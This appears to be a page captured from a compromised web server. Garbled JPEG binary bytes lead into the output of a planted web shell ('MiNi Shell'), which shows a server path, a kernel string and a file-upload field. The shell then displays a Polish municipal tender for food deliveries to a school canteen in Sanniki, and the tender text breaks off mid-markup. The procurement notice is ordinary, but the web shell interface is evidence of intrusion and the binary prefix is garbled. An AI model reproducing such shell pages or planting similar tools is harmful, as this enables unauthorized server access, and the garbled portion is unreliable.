JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230803/0034002001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2023/2024” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Sanniki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015916</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 169</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sanniki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 277 78 10</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 77 78 15</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sanniki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sanniki.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2023/2024” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7ea4a8ae-321b-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00340020</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00023891/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7ea4a8ae-321b-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie<br/>e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>3. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>4. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia.<br/>5. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>7. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>8. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>9.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres <br/>e-mail:sekretariar@sanniki.pl ( nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Miasto i Gmina Sanniki, zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego<br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016,str. 1), dalej „RODO”, informuje, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Miasto i Gmina Sanniki<br/> z siedzibą: ul. Warszawska 169,09-540 Sanniki, tel. 24 277 68 51, e-mail: sekretariat@sanniki.pl, <br/>2. Inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy Sanniki jest Paweł Modrzejewski. Kontakt z Inspektorem Ochrony Danych Osobowych: inspektor@kiodo.pl,<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2023/2024”<br/>4. Odbiorcami danych osobowych są lub mogą zostać: podmioty, którym na podstawie umowy powierzono przetwarzanie danych osobowych, operatorzy pocztowi i firmy kurierskie, banki organy administracji publicznej w tym inne jednostki samorządu terytorialnego lub urzędy państwowe w zakresie, w jakim będzie to wynikać z przepisów prawa zobowiązujących do udostępnienia tych danych, podmioty, którym Administrator ma obowiązek przekazać dane na podstawie obowiązujących przepisów prawa - min. w oparciu o art.18 oraz art. 74 ustawy z dnia 11 września 2019r. (t.j.Dz. U. 2022 poz. 1710 z późn. zm.) Prawo Zamówień publicznych.<br/>5. Pani/Pana dane osobowe będą przechowywane, przez okres 5 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lat, okres przechowywania obejmuje cały czas trwania umowy, nie dłużej jednak niż lat 15;<br/>6. Podanie danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia publicznego nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału, a następnie wykonywania umowy. W przypadku nie podania danych Zamawiający może odrzucić ofertę.<br/>7. Posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych z tym zastrzeżeniem, że sprostowanie lub uzupełnienie nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub postanowień umowy <br/>w zakresie niezgodnym z ustawą PZP*;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>______________________<br/>15<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DG,271.9.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mięso produkty mięsno -wędliniarskie i drób<br/>Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	schab bez kości	29	kg<br/>2	schab z kością	10	kg<br/>3	pachwina wędzona	10	kg<br/>4	łopatka z kością	15	kg<br/>5	łopatka bez kości	25	kg<br/>6	żeberka	53	kg<br/>7	wołowina rosołowa	4	kg<br/>8	golonka	2	kg<br/>9	mięso mielone	20	kg<br/>10	mięso na gulasz	12	kg<br/>11	boczek surowy	2	kg<br/>12	boczek wędzony	5	kg<br/>13	wołowina bez kości	7	kg<br/>14	polędwica sopocka	3	kg<br/>15	kiełbasa podwawelska	10	kg<br/>16	kiełbasa biała surowa	17	kg<br/>17	kiełbasa śląska	2	kg<br/>18	szynka z indyka	12	kg<br/>19	szynka	2	kg<br/>20	udziec z kurczaka	45	kg<br/>21	porcje rosołowe	107	kg<br/>22	skrzydełka	30	kg<br/>23	filet z kurczaka	42	kg<br/>24	wątróbka drobiowa	8	kg<br/>25	podudzie z kurczaka	40	kg<br/>26	mięso mielone z indyka 500g Dubimex lub równoważne	4	kg<br/>27	polędwiczki wieprzowe	12	kg<br/>28	karkówka	12	kg<br/>29	indyk faszerowany	2	kg<br/>30	szynka swojska	1	kg<br/>31	polędwica miodowa	3	kg<br/>32	polędwica z warzywami	2	kg<br/>33	kurczak gotowany Dubimex lub równoważna	3	kg<br/>34	kiełbasa krakowska podsuszana	1	kg<br/>35	parówki „Berlinki” lub równoważne	8	kg<br/>36	pasztet „Podlaski” (puszka) 155g lub równoważny	6	kg<br/>37	filet z indyka	12	kg<br/>38	boczek wędzony	1	kg<br/>39	szynkówka”Peklimar” lub równoważna	2	kg<br/>40	szynka gotowana Peklimar lub równoważna	3	szt<br/>41	kiełbasa golonkowa	2	kg<br/>42	szynka konserwowa Peklimar lub równoważna	2	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Nazwa kryterium:	Waga<br/>cena za wykonanie całości zamówienia	100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie,<br/>Cn - cena ofertowa ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mleko i przetwory mleczne<br/>Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>ser biały – półtłusty	45	kg<br/>mleko w butelce 3,2%	200	litr<br/>śmietana 30% (0,5l)	81	szt.<br/>masło śmietankowe z Ostrołęki – 200g lub równoważne	138	szt.<br/>serek &#34;Danio&#34; lub równoważny – 150g	60	szt.<br/>serek „Twój smak” lub równoważny - 200g	6	szt.<br/>ser żółty Gouda lub równoważny	5	szt<br/>jogurt smakowy Polskie smaki 130g Bakoma lub równoważny	20	kg<br/>jogurt naturalny 370g Zott lub równoważny	8	szt.<br/>jogurt naturalny typu greckiego 440 g Bakoma kub równoważny	20	szt.<br/>jogurt smakowy 150g Jogobella lub równoważny	20	szt.<br/>masło roślinne w kubku -250 g	37	szt.<br/>śmietana 18% 400g Piątnica lub równoważna	40	szt<br/>jogurt mały (115g) Danone Gratka lub równoważny	40	szt.<br/>serek topiony 100g Hochland lub równoważny	13	szt.<br/>serek feta 270 g Mlekowita lub równoważny	10	szt.<br/>ser mascarpone 250 g	2	szt.<br/>maślanka 750g Łowicz lub równoważna	8	szt<br/>lody w kubku 280 ml „Olka” lub równoważne	15	szt.<br/>serek homogenizowany Rolmlecz 150g lub równoważny	20	szt.<br/>jogurt Piątuś 125g Piątnica	20	szt.<br/>serek Bakuś Puszysty 90g lub równoważny	20	szt.<br/>mleczko kokosowe puszka	1	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Nazwa kryterium:	Waga<br/>cena za wykonanie całości zamówienia	100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie,<br/>Cn - cena ofertowa ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przetwory owocowe i owoce <br/>Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	jabłka	80	kg<br/>2	cytryny	12	kg<br/>3	banany	47	kg<br/>4	dżem truskawkowy 280g Łowicz lub równoważny	42	szt.<br/>5	dżem brzoskwiniowy 280g Łowicz lub równoważny	4	szt.<br/>6	dżem wiśniowy 280 g Łowicz lub równoważny	4	szt.<br/>7	truskawki mrożone 450g Unifreeze lub równoważne	38	szt.<br/>8	wiśnie mrożone 450g Unifreeze lub równoważne	33	szt<br/>9	czarna pożeczka mrożona 450g Unifreeze lub równoważne	9	szt.<br/>10	mandarynki	12	kg<br/>11	truskawki (produkty sezonowe)	12	kg<br/>12	gruszki	10	kg<br/>13	winogrono	8	kg<br/>14	kiwi	30	kg<br/>15	syrop owocowy 400g Łowicz lub równoważny	36	kg<br/>16	śliwki	3	kg<br/>17	arbuz	6	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Nazwa kryterium:	Waga<br/>cena za wykonanie całości zamówienia	100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie,<br/>Cn - cena ofertowa ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 